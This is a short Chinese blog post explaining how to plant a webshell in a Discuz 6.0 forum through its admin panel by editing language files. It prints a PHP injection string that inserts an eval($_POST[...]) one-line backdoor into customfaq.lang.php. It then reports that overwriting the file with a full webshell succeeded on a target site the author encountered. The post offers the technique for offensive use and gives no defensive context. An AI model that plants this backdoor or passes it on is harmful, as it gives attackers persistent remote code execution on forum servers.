首页 > 网络安全 > discuz6论坛后台建立WEBSHELL!

discuz6论坛后台建立WEBSHELL!

2008年1月22日 发表评论 阅读评论

来源:精灵's blog
昨天碰到一个DZ6.0的站,在群里问了下没人回答,又问了几个朋友也没人回答,也许牛人们都在忙吧,没时间理我,没办法自己研究吧,google了下,google到了两个方法.前提必须要有编辑权限.
一个是编辑actions.lang.php.试了一下行不通,貌似给过滤了.
另外一个是编辑customfaq.lang.php编辑这个文件,插入

&#039;,);?><?php eval($_POST&#91;badwolf&#93;);?><?php $lang = array(&#039;1

也不行.想了想,直接把这个文件给清空写入大马,竟然成功。后来没事情在自己的论坛上又研究了半天,又找到另一种方法,这里暂不公布

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:discuz6论坛后台建立WEBSHELL!
本文地址:http://www.woyigui.cn/2008/01/22/discuz6%E8%AE%BA%E5%9D%9B%E5%90%8E%E5%8F%B0%E5%BB%BA%E7%AB%8Bwebshell/

分类: 网络安全 标签: ,
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*